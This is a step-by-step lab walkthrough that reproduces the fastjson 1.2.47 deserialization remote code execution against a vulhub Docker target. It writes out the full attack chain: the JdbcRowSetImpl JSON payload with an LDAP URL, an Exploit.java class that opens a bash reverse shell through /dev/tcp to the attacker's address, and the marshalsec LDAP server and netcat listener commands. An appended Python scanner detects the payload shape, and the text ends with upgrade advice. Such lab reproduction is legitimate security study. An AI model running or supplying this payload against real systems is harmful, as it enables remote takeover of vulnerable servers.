Reproducing the fastjson 1.2.47 deserialization vulnerability
Environment setup
Start docker
systemctl start docker
Download the environment
git clone https://github.com/vulhub/vulhub.git
Build the docker environment
cd vulhub/fastjson/1.2.47-rce/
docker-compose up -d
docker ps
Confirm that the docker container is running
Vulnerability detection
Telling Fastjson and Jackson apart
{"name":"S", "age":21}
{"name":"S", "age":21,"agsbdkjada__ss_d":123}
Fastjson accepts both of these without error, whereas Jackson errors on the second one: Jackson forces the keys to align with the javabean properties, so fewer keys are fine but extra keys are not, and the unknown key makes it throw.
Reproducing the vulnerability
Switching the java version on kali
update-alternatives --config java
java -version
update-alternatives --config javac
javac -version
Building with maven
git clone --depth=1 https://github.com.cnpmjs.org/mbechler/marshalsec.git
cd marshalsec/
mvn clean package -DskipTests
cd target/
Listen on kali to test the outbound connection
ifconfig
nc -lvvp 7777
In burp, replace the json body with the following, changing the IP in it to kali's IP
{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://IP:7777/Exploit","autoCommit":true}}
Compile Exploit.java
The ip and port must be changed to kali's
import java.lang.Runtime;
import java.lang.Process;

public class Exploit {
    // Static initializer: runs as soon as the class is loaded, which is why the
    // command executes when the LDAP reference makes the target load this class.
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            // "ip" and "port" are placeholders: replace them with kali's address and listening port
            String[] commands = {"/bin/bash","-c","exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}
javac Exploit.java
Set up the LDAP server and the web server
Change the IP to the local IP
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://IP/#Exploit
python3 -m http.server 80 (or python -m SimpleHTTPServer 80)
Listen for the shell
nc -lvvp 2345
Send the packet
After changing the ip to kali's ip, send it with burp
{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://ip:1389/Exploit","autoCommit":true}}
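As an added defender-side example (not part of the original write-up), the following Python scanner flags the request shape used above: any `@type` key, the `java.lang.Class` + `val` pair that poisons the type cache in 1.2.47, and a `dataSourceName` carrying a JNDI URL. The sample bodies and the address 10.0.0.1 are constructed for the test; the two benign bodies are the Fastjson/Jackson fingerprint requests from the detection section.

```python
import json
import re

# Constructed sample bodies: the two fingerprint requests from the detection
# section and the 1.2.47 bypass shape (address is a made-up placeholder).
SAMPLE_BODIES = [
    '{"name":"S", "age":21}',
    '{"name":"S", "age":21,"agsbdkjada__ss_d":123}',
    '{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
    '"x":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
    '"dataSourceName":"ldap://10.0.0.1:1389/Exploit","autoCommit":true}}',
]

# JNDI schemes that a client-supplied dataSourceName should never carry.
JNDI_SCHEME = re.compile(r"^(ldap|ldaps|rmi|iiop)://", re.IGNORECASE)

def _walk(node, findings, path="$"):
    """Recursively collect suspicious markers from a parsed JSON tree."""
    if isinstance(node, dict):
        atype = node.get("@type")
        if atype is not None:
            findings.append(("autotype", path, str(atype)))
            # java.lang.Class with a val field is the cache-poisoning step
            if atype == "java.lang.Class" and "val" in node:
                findings.append(("class-val-bypass", path, str(node["val"])))
        for key in ("dataSourceName", "jndiName"):
            val = node.get(key)
            if isinstance(val, str) and JNDI_SCHEME.match(val):
                findings.append(("jndi-url", f"{path}.{key}", val))
        for k, v in node.items():
            _walk(v, findings, f"{path}.{k}")
    elif isinstance(node, list):
        for i, v in enumerate(node):
            _walk(v, findings, f"{path}[{i}]")

def scan_body(body):
    """Return (kind, json_path, value) findings; an empty list means clean.
    Unparsable bodies are reported rather than silently ignored."""
    try:
        data = json.loads(body)
    except ValueError as exc:
        return [("unparsable", "$", str(exc))]
    findings = []
    _walk(data, findings)
    return findings

def is_suspicious(body):
    """True when the body contains any autotype or JNDI marker."""
    return any(kind != "unparsable" for kind, _, _ in scan_body(body))

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(is_suspicious(body), scan_body(body))
```

In practice the same walk belongs in a WAF rule or a request-logging filter, and the cleaner fix on the application side is to upgrade fastjson and keep autotype disabled.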